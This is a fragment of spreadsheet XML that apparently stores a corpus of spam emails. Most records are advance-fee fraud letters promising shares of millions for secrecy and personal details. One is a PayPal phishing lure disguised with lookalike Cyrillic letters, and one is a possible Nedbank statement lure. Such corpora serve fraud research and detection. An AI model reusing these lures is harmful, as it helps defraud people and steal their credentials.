sum if you agree to transact the business with me.\n\n\nDr.usman karim\nBANK OF AFRICA,\nBurkina Faso-West Africa.\n\n_________________________________________________________________\nMSN Hotmail sur i-mode : envoyez et recevez des e-mails depuis votre \ntlphone portable ! [URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.september11victims.com http://www.msn.fr</t>
  </si>
  <si>
    <t>2052</t>
  </si>
  <si>
    <t>To: nan\nFrom: oluyemi adeniji &lt;ministeroluadeniji@hotmail.com&gt;\nDate: Wed, 03 May 2006 14:43:53 +0000</t>
  </si>
  <si>
    <t>Wed, 03 May 2006 14:43:53 +0000</t>
  </si>
  <si>
    <t>oluyemi adeniji &lt;ministeroluadeniji@hotmail.com&gt;</t>
  </si>
  <si>
    <t>IMPORTANT NOTIFICATION</t>
  </si>
  <si>
    <t>Minister of Foreign Affairs\nFederal Ministry of foreign Affairs\nMaputo Street\nWuse Zone 3 PMB 130\nGarki Abuja\nNigeria\nPhone no:{234}803-2944-258\nEmail:oluyemiadeniji_nig@ministers.zzn.com\nDate:03,05,2006\n\nAttention:Dear\n\nI am Hon. Dr. Adeniji Olu, Minister Foreign Affairs Ministry; my\noffice monitors and controls the affairs of all banks and financial\ninstitutions in Nigeria concerned with foreign contract payments.\nI am the final signatory to any transfer or remittance of huge funds\nmoving within banks both on the local and international levels in line\nto foreign contracts settlement.\n\nI have before me list of funds, which could not be transferred to some\nnominated accounts as these accounts have been identified either as\nghost accounts, unclaimed deposits and over-invoiced sum etc. I write\nto presentyou to the federal government that you are among the people\nexpecting the funds to be transferred into their account, on this note;\nI wish to have a deal with you as regards to the unpaid certified\ncontract funds.I have every files before me and the data's will be to\nchange to your name to enable you receive the fund into your nominated\nbank account as the beneficiary of the fund's amount $20 Million U.S.D.\n\nAs it is my duty to recommend the transfer of these surplus funds to\nthe Federal Government Treasury and Reserve Accounts as unclaimed\ndeposits, I have the opportunity to write you based on the instructions\ni received 2 days ago from the Senate Committee on Contract Payments\n/Foreign Debts to submit the List of payment reports / expenditures and\naudited reports of revenues. Among several others,\nI have decided to remit this sum following my idea that we have a deal\n/agreement and I am going to do this legally.\n\nMY CONDITIONS.\n\n1. You will give me 40% of your contract funds as soon as you confirm\nit inoyur designated bank account.\n\n2. This deal must be kept secret forever, and all correspondence will\nbestrictly by email / telephone, for security purposes.\n\n3. There should be no third parties as most problem associated with\nyour fund release are caused by your agents or representative.\n\nIf you AGREE with my conditions, l advise you on what to do immediately\nand the transfer will commence without delay as I will proceed to fix\nyour name on the Payment schedule instantly to meet the three days mandate.\n\nI hope you don't reject this offer and have the funds transferred.\nWaiting for your reply soon.Please forward all your replies to my\nofficial e mail address;oluyemiadeniji_nig@ministers.zzn.com\n\nHON. DR. ADENIJI OLU\nFOREIGN AFFAIRS MINISTER\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today - it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1295</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Nedbank Credit Card monthly eStatement" &lt;consumerstatements@nedbankestatements.com&gt;\nDate: Wed, 03 Mar 2021 00:09:24 +0000 (UTC)</t>
  </si>
  <si>
    <t>Wed, 03 Mar 2021 00:09:24 +0000 (UTC)</t>
  </si>
  <si>
    <t>"Nedbank Credit Card monthly eStatement" &lt;consumerstatements@nedbankestatements.com&gt;</t>
  </si>
  <si>
    <t>Nedbank Credit Card monthly Charges eStatement</t>
  </si>
  <si>
    <t>Welcome to your monthly Nedbank card eStatement  Dear Customer  Attached to this email is your latest monthly card eStatement, which is encrypted to ensure your confidentiality. To view your card eStatement please ensure you have Adobe Reader installed. (To download Adobe Reader kindly go to [URL]www.adobe.com[/URL]  If your identity document was used to open your account, your identity number is your eStatement password. Alternatively, if your passport was used to open your account, kindly use your passport number as your password.  If you have any questions or want to unsubscribe from this service, please contact our service centre on 011 710 4710.  For more information on your credit card benefits or the Nedbank product offering please visit [URL]www.nedbank.co.za[/URL]  Yours sincerely Nedbank Card Verify the integrity and origin of this email: 1.This message has been signed by the sender. 2.If the content of the message has been tampered with, you will receive a security warning when opening this email to alert you that the message might have been tampered with, or might not have come from the supposed sender. 3.If you want to verify the sender's digital identity, simply click on the red ribbon icon and select the option to view the signing digital ID or to view the certificate. Nedbank Limited Reg No 1951/000009/06, VAT Reg No 4320116074, 135 Rivonia Road, Sandown, Sandton, 2196, South Africa. We subscribe to the Code of Banking Practice of The Banking Association South Africa and, for unresolved disputes, support resolution through the Ombudsman for Banking Services. We are an authorised financial services provider. We are a registered credit provider in terms of the National Credit Act (NCR Reg No NCRCP16).  Welcome to your monthly Nedbank card eStatement Dear Customer Attached to this email is                    your latest monthly card eStatement, which is encrypted to                    ensure your confidentiality. To view your card eStatement                    please ensure you have Adobe Reader installed. (To download                    Adobe Reader kindly go to [URL]www.adobe.com[/URL] If your                    identity document was used to open your account, your identity                    number is your eStatement password. Alternatively, if your                    passport was used to open your account, kindly use your                    passport number as your password. If you have any                    questions or want to unsubscribe from this service, please                    contact our service centre on 011 710                    4710. For more information on your                    credit card benefits or the Nedbank product offering please                    visit [URL]www.nedbank.co.za[/URL]  Yours                          sincerelyNedbank Card Verify the integrity and origin of this                                email: 1. This message has been signed by the                                sender. 2. If the content of the message has been                                tampered with, you will receive a security warning                                when opening this email to alert you that the                                message might have been tampered with, or might                                not have come from the supposed                            sender. 3. If you want to verify the sender's                                digital identity, simply click on the red ribbon                                icon and select the option to view the signing                                digital ID or to view the  certificate. Nedbank Limited Reg No                                1951/000009/06, VAT Reg No 4320116074, 135 Rivonia                                Road, Sandown, Sandton, 2196, South Africa. We                                subscribe to the Code of Banking Practice of The                                Banking Association South Africa and, for                                unresolved disputes, support resolution through                                the Ombudsman for Banking Services. We are an                                authorised financial services provider. We are a                                registered credit provider in terms of the                                National Credit Act (NCR Reg No NCRCP16).                               Online Banking Nedbank ChatBranch locator+27 86 055 5111Experience our new online bankingFastEasySecureAccess an enhanced banking experience with great new features and regular updates.Explore our demoIntegrated with secure online infrastructure.Beware of the latest scamsThere has been an increase in online fraud in the banking industry with some of the latest scams involving fraudsters prompting you to click on a link in an email or SMS.Learn more → Important information  Fraud awareness  Browser requirements  Online share trading  Trusteer Rapport security  Experience our new online banking New to our latest online banking? Register  or  Log in with your Nedbank ID. Username Please enter your Nedbank ID username and password to log in. Password Mobile number Please enter your Nedbank ID username and password to log in. Forgot your details? By logging in you accept the terms and conditions.  Log in  Explore our demoIntegrated with secure online infrastructure.While you’re at it, download our newNedbank Money appBeware of the latest scamsThere has been an increase in online fraud in the banking industry with some of the latest scams involving fraudsters prompting you to click on a link in an email or SMS.Learn more → Important information  Fraud awareness  Browser requirements  Online share trading  Trusteer Rapport security  Important information  Fraud awareness  Browser requirements  Online share trading  Trusteer Rapport security Beware of the latest scamsThere has been an increase in online fraud in the banking industry with some of the latest scams involving fraudsters prompting you to click on a link in an email or SMS.Learn more →  Nedbank Ltd Reg No 1951/000009/06.  Authorised financial services and registered credit provider (NCRCP16). ContactFind an ATM or branchHelpTerms and conditions</t>
  </si>
  <si>
    <t>www.adobe.com www.nedbank.co.za www.adobe.com www.nedbank.co.za</t>
  </si>
  <si>
    <t>2829</t>
  </si>
  <si>
    <t>To: nan\nFrom: larisa@lsosnitskaya1.orangehome.co.uk\nDate: Wed, 03 Jan 2007 21:14:09 +0100</t>
  </si>
  <si>
    <t>Wed, 03 Jan 2007 21:14:09 +0100</t>
  </si>
  <si>
    <t>larisa@lsosnitskaya1.orangehome.co.uk</t>
  </si>
  <si>
    <t>Mrs. Larisa Sosnitskaya</t>
  </si>
  <si>
    <t>Mrs. Larisa Sosnitskaya\nPLEASE FOR CONFIDENTIALITY REASONS CONTACT ME THROUGH MY SECURED EMAIL ADDRESS: larisasosnitska_ya@yahoo.de\n \nDear Partner,\n \nI am Mrs. Larisa Sosnitskaya and I represent Mr. Mikhail Khordokovsky the former C.E.O of Yukos Oil Company in Russia.  (Russian Largest Oil Company) Chairman CEO: Menatep SBP Bank (A well reputable financial institution with itœµ Branches all over the world) I have a very sensitive and confidential brief from this top (oligarch) to ask for your  partnership in re-profiling funds US$46 Million. I will give the details, but in summary, the funds are coming via Bank Menatep. \n \nSOURCE OF FUNDS: I have a profiling amount in an excess of US$46 Million (Forty-six Million dollar) which I seek your Partnership in accommodating for me. You will be rewarded with 20% of the total sum for your partnership. Can you be my partner on this? Already the funds have left the shore of Russia through diplomatic means to a European Holding firm where the final crediting is expected to be carried out. While I was on the process, My Boss got arrested for his Involvement in politics by financing the leading And opposing political parties (the Union of Right Forces, led by Boris Nemtsov, and Yabloko, a liberal/social democratic party Led by Gregor Yavlinsky) which poses treat to President Vladimir Putin Second Tenure as Russian president. You can catch more of the story on this website: \n \n[URL]http://www.mosnews.com[/URL]\n[URL]http://www.mbktrial.com[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://www.themoscowtimes.com[/URL]\n[URL]http://www.nndb.com[/URL]\n \nYOUR ROLE: All I need from you is to stand as the beneficiary of the above quoted sum and I will re-profile the funds with your name, which will enable the European Holding firm transfer the sum to you. I have decided to use this sum to relocate to American continent and never to be connected to any of Mikhail khodorkovsky conglomerates. The transaction has to be concluded within 5 to 10 bank working days, as soon as I confirm your readiness to conclude the transaction with me. Contact me via my private box: larisasosnitska_ya@yahoo.de so that I can furnish you with more details. \n \nThank you very much, \n \nRegards, \n \nMrs. Larisa Sosnitskaya.</t>
  </si>
  <si>
    <t>http://www.mosnews.com http://www.mbktrial.com http://news.bbc.co.uk http://www.themoscowtimes.com http://www.nndb.com</t>
  </si>
  <si>
    <t>494</t>
  </si>
  <si>
    <t>To: R@M\nFrom: oliver yengeni &lt;oliveryengeni@tiscali.co.uk&gt;\nDate: Wed, 03 Dec 2003 14:38:44 -0500</t>
  </si>
  <si>
    <t>Wed, 03 Dec 2003 14:38:44 -0500</t>
  </si>
  <si>
    <t>oliver yengeni &lt;oliveryengeni@tiscali.co.uk&gt;</t>
  </si>
  <si>
    <t>MAIL ME</t>
  </si>
  <si>
    <t>Good Day,\n\nWith warm hearts I offer my friendship, and my greetings, and I hope this letter meets you in good time. However, I am sincerely seeking your confidence in this transaction, which I propose with my free mind and as a person of integrity.\n\nI got your contact as a result of my discreet search for an associate in your country. I know this e-mail must come to you as a surprise,more so that we have not met before.I maintain the theory that business is people and contacts hence this e-mail to you.I am particularly interested in dealing with you because I expect you to be reliable and be more helpful.\nMy name is Mr Oliver yengeni a south African citizen.I am the younger brother to Mr Tony Yengeni.My brother Mr.Tony was the chairman of parliament's in south Africa and the former chief whip of the ruling political party ANC .My Brother (MR. T. YENGENI),as a result of trust and Confidence he has mandated me that I search for a Reliable and trustworthy foreign partner, who will assist me in receiving some funds,which we have in cash Totalling US$27.5m(Twenty-seven million five hundred thousand dollars ) into a personal,company or any Reliable foreign bank account for safe keeping for a period of time, since our family bank accounts Within and outside the country have all been Frozen by the authorities.\n\nI would refer you to these three Websites for further information About my family and Why I Really Require Your Assistance.\n\n(i)[URL]http://news.bbc.co.uk[/URL]\n\nii) [URL]http://news.bbc.co.uk[/URL]\n  iii)[URL]http://www.cnn.com[/URL]\n\nHowever, I still want to let you know that this money is under the custody of a Private Security And Finance Company in Europe.I am believing you to be a trustworthy person and will not take advantage of us when the money gets to you.\nThe total sum will be shared as follows:for your assistance we are offering you 20% , 70% For my family, 10% will be used for the reimbursement of all the expenses we will incurr in the process of this transaction. \nThere is no risk involved as we have put all modalities in place to see to the success of this project.YOU MUST NOT CALL ME\nIf you are interested in assisting us, urgently reply via the above email address.Please endeavour to keep this Transaction confidential.I will be very glad if you can come forward to help us.\nI thank you in advance as I anticipate your assistance in enabling me achieve this goal.\n\nGod bless,\n\nOliver Yengeni.\n\n   \nNB:If you agree to my terms, kindly as a matter of urgency send me an email. Due to my sensitive position in the South African Government, I would not WANT you to call me on phone or send a fax to me. All correspondence must be by email.\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc.co.uk http://www.cnn.com</t>
  </si>
  <si>
    <t>3060</t>
  </si>
  <si>
    <t>To: nan\nFrom: usman adamu &lt;usman_adamu12@hotmail.com&gt;\nDate: Wed, 02 May 2007 21:59:01 +0000</t>
  </si>
  <si>
    <t>Wed, 02 May 2007 21:59:01 +0000</t>
  </si>
  <si>
    <t>usman adamu &lt;usman_adamu12@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Re: PLEASE URGENT RESPONSE NEEDED </t>
  </si>
  <si>
    <t>FROM THE DESK OF DR.USMAN ADAMU\nAUDITING AND ACCOUNTING MANAGER,\nBANK OF AFRICA (B.O.A)\nOUAGADOUGOU-BURKINA FASO.\nBANK WEBSITE:[URL]www.bkofafrica.net[/URL]\n\nDear Friend,\n\nI am the manager of auditing and accounting department of BANK OF AFRICA\n(B.O.A) here in Ouagadougou, Burkina Faso. In my department we discovered an\nabandoned sum of US$20.5m dollars (Twenty Million Five Hundred Thousand US\ndollars) in an account that belongs to one of our foreign customer (MR.\nRICHARD BURSON from Florida, U.S.A) who died along with his entire family on\nNovember 1999 in a plane crash.For more informations about the crash you can\nvisit this site: [URL]http://news.bbc.co.uk[/URL]\n\nSince we got information about his death, we have been expecting his next of\nkin to come over and claim his money because we can not release it unless\nsome body applies for it as next of kin or relation to the deceased as\nindicated in our banking guidlings and laws but unfortunately we learnt that\nall his supposed next of kin or relation died alongside with him at the\nplane crash leaving nobody behind for the claim. It is therefore upon this\ndiscovery that I now decided to make this business proposal to you,so that\nthe money can be release to you as the next of kin or relation to the\ndeceased for safety and subsequent disbursement since nobody will come for\nit and we don't want this money to go into the bank treasury as unclaimed\ndormant fund.\n\nThe banking law and guidline here stipulates that if such money remained\nunclaimed after eight years the money will be transfered into the bank\ntreasury as unclaimed dormant fund. The request of foreigner as next of kin\nin this business is occassioned by the fact that the customer was a\nforeigner and a Burkinabe like me can not stand as next of kin to a\nforeigner.\n\nI agreed that 30% of this money will be for you as a respect to the\nprovision of a foriegn account ,10% will be set aside for expenses incurred\nduring the business and 60% would be for me.Thereafter, I will visit your\ncountry for disbursement according to the percentage indicated Therefore, to\nenable the immediate transfer of this fund to you arranged,you must apply\nfirst to the bank as relation or next of kin to the deceased customer with a\ntext of application that i will send to you,but before i send to you the\ntext of application form,I will like you to send me the following\ninformatios\n\n1.NAME IN FULL:................................\n2.ADDRESS:.......................................\n3.NATIONALITY:...................................\n4.AGE:.............................................\n5.Sex..............................................\n6.OCCUPATION:......................................\n7.MARITAL STATUS:..................................\n8.PRIAVTE PHONE NO............................................\n9.PRIVATE FAX NO:.............................................\n\nso i will like you to send to me those informations for easy and effective\ncommunication.\nUpon receipt of your reply, I will send to you by fax or email the text of\nthe application form.I will not fail to bring to your notice that this\ntransaction is hitch-free and that you should not entertain any atom of fear\nas all required arrangements have been made for the transfer. You should\ncontact me immediately as soon as you receive this letter,if only you are\nintrested and ready to help.\nTrusting to hear from you immediately.\nYours Faithfully,\n\nDR.USMAN ADAMU\nMANAGER AUDITING AND ACCOUNTING DEPARTMENT\nBANK OF AFRICA\n\n_________________________________________________________________\nTestez Windows Live Mail Beta ! [URL]http://www.ideas.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>www.bkofafrica.net http://news.bbc.co.uk http://www.ideas.live.com</t>
  </si>
  <si>
    <t>141</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: =?UTF-8?B?zqHQsNGDzqHQsGwgSW5jLg==?= &lt;esolution@management-support-center.com&gt;\nDate: Wed, 02 Mar 2016 01:16:49 +0100</t>
  </si>
  <si>
    <t>Wed, 02 Mar 2016 01:16:49 +0100</t>
  </si>
  <si>
    <t>=?UTF-8?B?zqHQsNGDzqHQsGwgSW5jLg==?= &lt;esolution@management-support-center.com&gt;</t>
  </si>
  <si>
    <t>(#) Yоu’rе соnсеrnеd аbоut роtеntіаl unаuthоrіzеd асtіvіtу =============================================================================== Hеllо, То hеlр рrоtесt уоur ассоunt wе rеgulаrlу lооk fоr еаrlу ѕіgnѕ оf роtеntіаllу frаudulеnt асtіvіtу. Reᴄentlу, уоur аᴄᴄоunt wаѕ frozen beᴄаuѕe оf а роtentіаl ᴄоnneᴄtіоn tо ѕоme frаudulent activities. Tо аvоіd аn eventuаl reѕtrісtіоn tо уоur ассоunt, you should сomplete this sеᴄurіty check bу logging in our **Resolution Center**. [ Rеѕtоrе my ассоunt]([URL]https://resolution-managing-center.com[/URL][[email]]) **Why іs thіs nесеssаry?** Yоur ассоunt wаs frоzеn аnd yоu hаvе tо соmplеtе оur sесurіty сhесks, thеn yоu саn shоp оnlіnе аnd sеnd mоnеy еаsіly tо frіеnds аnd fаmіly. Thіs еmаіl wаs sеnt tо **jose@monkey.org**, bеᴄаusе yоur еmаіl рrеfеrеnᴄеs аrе sеt tо rеᴄеіvе оur sеᴄurіty nоtіfісаtіоns. Plеаsе dо nоt rеply tо thіs еmаіl. Tо gеt іn tоuсh, gо tо thе ΡауΡаl wеbsіtе аnd сlісk **Help**. Cоpyrіght © 1999-2016 ΡауΡаl. аll rіghts rеsеrvеd. Important - Urgent account setup Yоu’rе соnсеrnеd аbоut роtеntіаl unаuthоrіzеd асtіvіtу Hеllо, То hеlр рrоtесt уоur ассоunt wе rеgulаrlу lооk fоr еаrlу ѕіgnѕ оf роtеntіаllу frаudulеnt асtіvіtу. Reᴄentlу, уоur аᴄᴄоunt wаѕ frozen beᴄаuѕe оf а роtentіаl ᴄоnneᴄtіоn tо ѕоme frаudulent activities. Tо аvоіd аn eventuаl reѕtrісtіоn tо уоur ассоunt, you should сomplete this sеᴄurіty check bу logging in our Resolution Center. Rеѕtоrе my ассоunt Why іs thіs nесеssаry? Yоur ассоunt wаs frоzеn аnd yоu hаvе tо соmplеtе оur sесurіty сhесks, thеn yоu саn shоp оnlіnе аnd sеnd mоnеy еаsіly tо frіеnds аnd fаmіly. Thіs еmаіl wаs sеnt tо jose@monkey.org, bеᴄаusе yоur еmаіl рrеfеrеnᴄеs аrе sеt tо rеᴄеіvе оur sеᴄurіty nоtіfісаtіоns. Plеаsе dо nоt rеply tо thіs еmаіl. Tо gеt іn tоuсh, gо tо thе ΡауΡаl wеbsіtе аnd сlісk Help. Cоpyrіght © 1999-2016 ΡауΡаl. аll rіghts rеsеrvеd.</t>
  </si>
  <si>
    <t>https://resolution-managing-center.com</t>
  </si>
  <si>
    <t>1166</t>
  </si>
  <si>
    <t>To: researchers-owner@krusty.si.UM\nFrom: researchers-owner@krusty.si.UM\nDate: Wed, 02 Mar 2005 06:12:12 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Mar 2005 06:12:12 -0500</t>
  </si>
  <si>
    <t>researchers-owner@krusty.si.UM</t>
  </si>
  <si>
    <t>Researchers post from jameswilliam@eresmas.com requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    Researchers@lists.si.UM\n    From:    jameswilliam@eresmas.com\n    Subject: RE: FROM J. WILLIAM\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://lists.si.UM[/URL]\n        \nto approve or deny the request.\n</t>
  </si>
  <si>
    <t>http://lists.si.UM</t>
  </si>
  <si>
    <t>1165</t>
  </si>
  <si>
    <t>To: nan\nFrom: mark113 &lt;mark100414@teenmail.co.za&gt;\nDate: Wed, 02 Mar 2005 03:41:52 -0600</t>
  </si>
  <si>
    <t>Wed, 02 Mar 2005 03:41:52 -0600</t>
  </si>
  <si>
    <t>mark113 &lt;mark100414@teenmail.co.za&gt;</t>
  </si>
  <si>
    <t>Please Kindly Assist</t>
  </si>
  <si>
    <t>\nHello,\n\nIt may come to you as a surprise hearing from me, but to be precise I\ngot your data from the your e-mail site member directory in my search\nfor a competent business manager/hard working person who is willing and able to be my friend and partner, to liaise with me in order to \nexecute a project which I am convinced that you are capable and trusted to do this business with me.\n\nI am Mark Luke, 32 years old and good looking man, and I am from River\nState of Nigeria. I have B.SC in Public Administration and I work with\nGLOBAL SECURITY &amp; FINANCE LTD. I have now developed the interest in having a business investment outside Nigeria without my employers\nknowing about it. Hence I contacted you for friendship and business\nrelationship.\n\nThe fund in question proposed for this project is US$14.8million\n(Fourteen Million, Eight Hundred Thousand Dollars Only), which I will\nlike you to receive on my behalf and to invest it in your business or in\nany business that you think will be profitable in your country.\n\nPlease Note: This fund came as a result of a multi-national company that\nwe helped to secure an oil drilling contract some years ago. Because of\nour interest, the contract was over-invoiced to the above mentioned\namount and after the contract, the company received their actual\ncontract sum and went back to their country leaving behind this\nover-inflated sum for me and my colleagues to claim.\n\nNow the time has come for me to process and move the fund out for\ninvestment, but I can not do it on my own since I am still working with\nthe Global Security &amp; Finanace Ltd. This is why I need your help so that\nI can use you or your company to process the release of the fund as if \nyou are reciving a payment of an executed contract.\n\nPlease let me know about yourself/company and also let me know if you\ncan be able to receive the money on my behalf and invest it in your\ncompany or any good and profitable business in your country without\nexposing me, so that we can commence with the process of transfer. \nAll you need to send immediately is your FULL NAMES or COMPANY NAME and your TELEPHONE/FAX NUMBERS\n\nYour share will be 40% for your assistance, while I will take 55% and 5% will take care of any expenses that will be incurred in the cause of\ntransfer.\n\nPlease write back if only you know you are capable enough to execute\nthis project with me. Please this transaction requires utmost\nconfidentiality. My alternative Private email address is:\n            markluke@bareed.com\n\nLooking forward to your cooperation.\n\nYours faithfully,\nMark Luke\n\n\n___________________________________________________________________________\nMail sent from WebMail service at ::: OCD MAC ::: r - [URL]http://ocdmac.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://ocdmac.com</t>
  </si>
  <si>
    <t>1164</t>
  </si>
  <si>
    <t>To: R@M\nFrom: thomas sarr &lt;thomasarr37@yahoo.co.uk&gt;\nDate: Wed, 02 Mar 2005 00:26:28 +0100</t>
  </si>
  <si>
    <t>Wed, 02 Mar 2005 00:26:28 +0100</t>
  </si>
  <si>
    <t>thomas sarr &lt;thomasarr37@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>A plea for assistance!!!</t>
  </si>
  <si>
    <t>Dear friend,\n\n\nI MAKE THIS APPEAL WITH THE UNDERSTANDING THAT ANY \nFACTS OR OPINION EXPRESSED BY ME ARE GIVING IN\nCONFIDENCE AND SOLELY FOR YOUR PERSONAL INFORMATION\nAND USE. \n\nI am MR. Thomas Sarr, the manager of bill and exchange\nat the foreign remittance department of my  Bank. In\nmy department I discovered an abandoned sum of\nUS$8.5m,(Eight Million, Five Hundred Thousand US  \nDollars) with account number 14-2558-5976 that belongs\nto one of our  foreign customers who died along with\nhis wife and only daughter in a plane \ncrash of Alaska Airlines Flight number 261 which\ncrashed on 31 January, 2000. You shall read more about\nthe crash on visiting this site  \n[URL]http://www.cnn.com[/URL]\nThe owner of this account is Mr. Morris Thompson an\nAmerican and great industrialist and a resident of\nAlaska. \n\nIt is therefore upon this discovery that I now decided\nto make this business proposal to you and for our bank\nto release the money to you. You have to follow the\ninstructions which I will send to you as the next of\nkin or relation to the deceased for safety and\nsubsequent disbursement since nobody is coming for it\nand I don't want this money to go into \nour bank treasury as  unclaimed  bill. \n\nThe banking law and guidelines here stipulates that if\nsuch money remained unclaimed after three years, the \nmoney will be transfered into the bank treasury as\nunclaimed fund. The money has now stayed more than \nthree years and I am preparing documentations to prove\nthat this money has been transfered to our bank\ntreasury. It will be between me and you only that will\nknow that the money is not transfered into our\ntreasury. The request of foreigner as next of kin in\nthis transaction is occasioned by the fact that the\ncustomer was a foreigner and a Senegalese cannot stand\nas next of kin to a foreigner. \n\nIn appreciation of your assistance, I am offering you\n30% of the total sum. 5% for contingencies (cost of\ntransfer/other charges) likely to  be incurred during\nthe course of transaction, while the remaining 65% \nis  for me. \n\nUpon receipt of your reply, I will send to you by fax\nor email the text of the application which you will\ncomplete and forward to our bank asking for this money\nto be paid to you as the next of kin to Mr. Morris\nThomson. I will not fail to bring to your notice that\nthis transaction is hitch-free and that you should not\nentertain any fear as all required arrangements have\nbeen made for the transfer. You should contact me\nimmediately as soon as you receive this mail through\nthe above email.\n  \nPLEASE DO NOT HESITATE TO CONTACT ME IMMEDIATELY.\nPLEASE DO CONSIDER MY REQUEST AS URGENT. \n\nYou may contact me also at sarrthom1@lycos.com.\n\nYours  Faithfully,\n\n\nThomas SARR\n</t>
  </si>
  <si>
    <t>744</t>
  </si>
  <si>
    <t>To: semassaq@di-ve.com\nFrom: SESAY MASSAQUOE &lt;semassaq@o2.pl&gt;\nDate: Wed, 02 Jun 2004 20:41:58 +0200</t>
  </si>
  <si>
    <t>Wed, 02 Jun 2004 20:41:58 +0200</t>
  </si>
  <si>
    <t>SESAY MASSAQUOE &lt;semassaq@o2.pl&gt;</t>
  </si>
  <si>
    <t>semassaq@di-ve.com</t>
  </si>
  <si>
    <t>HELP ME AND MY FAMILY PLEASE.</t>
  </si>
  <si>
    <t>DEAR FRIEND,\n\nTHROUGH THE COURTESY OF BUSINESS OPPORTUNITY, I TAKE LIBERTY ANCHORED ON A\nSTRONG DESIRE TO SOLICIT YOUR ASSISTANCE ON THIS MUTUALLY BENEFICIAL AND\nRISKFREE TRANSACTION WHICH I HOPE YOU WILL GIVE YOUR URGENT ATTENTION.\n\nI AM MR.SESAY MASSAQUOE  I AM MOVED TO WRITE YOU THIS LETTER ,THIS WAS IN\nCONFIDENCE CONSIDERING OUR PRESENT CIRCUMSTANCE AND SITUATION.\n\nI ESCAPED WITH MY WIFE AND CHILDREN  OUT OF SIERRA- LEONE TO\nGROU-JIRNSSUM,A VILLAGE IN THE NETHERLANDS THROUGH THE AID OF THE UNITED\nNATIONS EVACUATION TEAM WHERE WE ARE NOW PRESENTLY RESIDING  ON TEMPORARY\nPOLITICAL ASYLUM.\n\nHOWEVER DUE TO THIS SITUATION I DECIDED TO CHANGE MOST OF MY BILLIONS OF\nDOLLARS DEPOSITED IN SWISS BANK AND OTHER COUNTRIES INTO OTHER FORMS OF\nMONEY CODED FOR SAFE PURPOSE BECAUSE THE NEW HEAD OF STATES  AHMED TEJAN\nKABBA MADE ARRANGEMENTS WITH THE SWISS GOVERNMENT AND OTHER EUROPEAN\nCOUNTRIES TO FREEZE ALL MY TREASURES DEPOSITED IN SOME EUROPEAN\nCOUNTRIES,HENCE I AND MY WIFE  ALONG WITH MY CHILDREN, DECIDED LAYING LOW\nIN THIS OUR TEMPOERY POLITICAL ASYLUM CAMP HERE IN GROU JIRNSSUM IN THE\nNETHERLANDS TO STUDY THE SITUATION TILL WHEN THINGS GETS BETTER,SINCE\nPRESIDENT TEJAN KABBA TAKING OVER GOVERNMENT AGAIN IN SIERRA-LEONE ONE OF\nMY  CHATEAUX IN SOUTHERN FRANCE WAS CONFISCATED BY THE FRENCH\nGOVERNMENT,AND AS SUCH WE HAD TO CHANGE OUR IDENTITY SO THAT OUR\nINVESTMENT WILL NOT BE TRACED AND CONFISCATED.\n\nI HAVE DEPOSITED THE SUM OF THIRTY MILLION,FIVE HUNDRED THOUSAND UNITED\nSTATES DOLLARS(US$30,500,000)WITH A SECURITY COMPANY FOR SAFEKEEPING.\nTHE FUNDS ARE SECURITY CODED TO PREVENT THEM FROM KNOWING THE ACTUAL\nCONTENTS.\n\nWHAT I WANT YOU TO DO NOW IS TO INDICATE YOUR INTEREST THAT YOU WILL\nASSIST ME AND MY IMMEDIATE FAMILY BY RECEIVING THE MONEY ON OUR BEHALF.\nTHE ACCOUNT REQUIRED FOR THIS PROJECT CAN EITHER BE PERSONAL,COMPANY OR AN\nOFFSHORE ACCOUNT THAT YOU HAVE TOTAL CONTROL OVER,YOUR AREA OF\nSPECIALISATION WILL NOT BE A HINDERANCE TO THE SUCCESSFUL EXECUTION OF\nTHIS TRANSACTION.\n\nACKOWLEDGE THIS MESSAGE,SO THAT I CAN INTRODUCE YOU TO MY FAMILY AS OUR\nFOREIGN TRUSTED PARTNER WHO SHALL TAKE CHARGE OF OUR INVESTMENT ABROAD\nWHERE WE NOW PLAN TO SETTLE.\n\nI WANT YOU TO ASSIST US IN INVESTING THIS MONEY,BUT I WILL NOT WANT OUR\nIDENTITY REVEALED.I WILL ALSO WANT TO BUY PROPERTIES AND STOCKS IN\nMULTI-NATIONAL COMPANIES AND TO ENGAGE IN OTHER SAFE AND NON SPECULATIVE\nINVESTMENTS.\nWE HAVE BEEN THROUGH A LOT OF HEALTH AND SPIRITUAL TURMOIL,HENCE WILL NEED\nYOUR UNDERSTANDING AND ASSISTANCE.\n\nMAY I AT THIS POINT EMPHASIZE THE HIGH LEVEL OF CONFIDENTIALLITY WHICH\nTHIS BUSINESS DEMANDS AND HOPE YOU WILL NOT BETRAY THE TRUST AND\nCONFIDENCE WHICH WE REPOSE IN YOU.I SHALL PUT YOU IN THE PICTURE OF THIS\nBUSINESS,I.E TELL YOU WHERE THE FUNDS ARE CURRENTLY BEING MAINTAINED AND\nALSO DISCUSS OTHER MODALITIES INCLUDING REMUNERATION FOR YOUR SERVICES.\n\nI SHALL INFORM YOU WITH  THE NEXT LINE OF ACTION AS SOON AS I RECEIVE YOUR\nPOSITIVE RESPONSE.\n\nIS THIS PROPOSITION ATTAINABLE?IF IT IS,PLEASE KINDLY FURNISH ME\nIMMEDIATELY BY E-MAIL WITH YOUR DIRECT TELEPHONE AND FAX NUMBERS TO\nENHANCE THE CONFIDENTIALLITY WHICH THIS BUSINESS DEMANDS.\n\nBEST REGARDS\nMR.SESAY MASSAQUOE.\nREPLY TO MY PRIVATE EMAIL ADDRESS...........&gt;sesmassa@pro.hu\n\n\n__________________________________________________________ \n For special offers on latest publications on Malta or by Maltese authors go to [URL]http://shop.di-ve.com[/URL]\n\n</t>
  </si>
  <si>
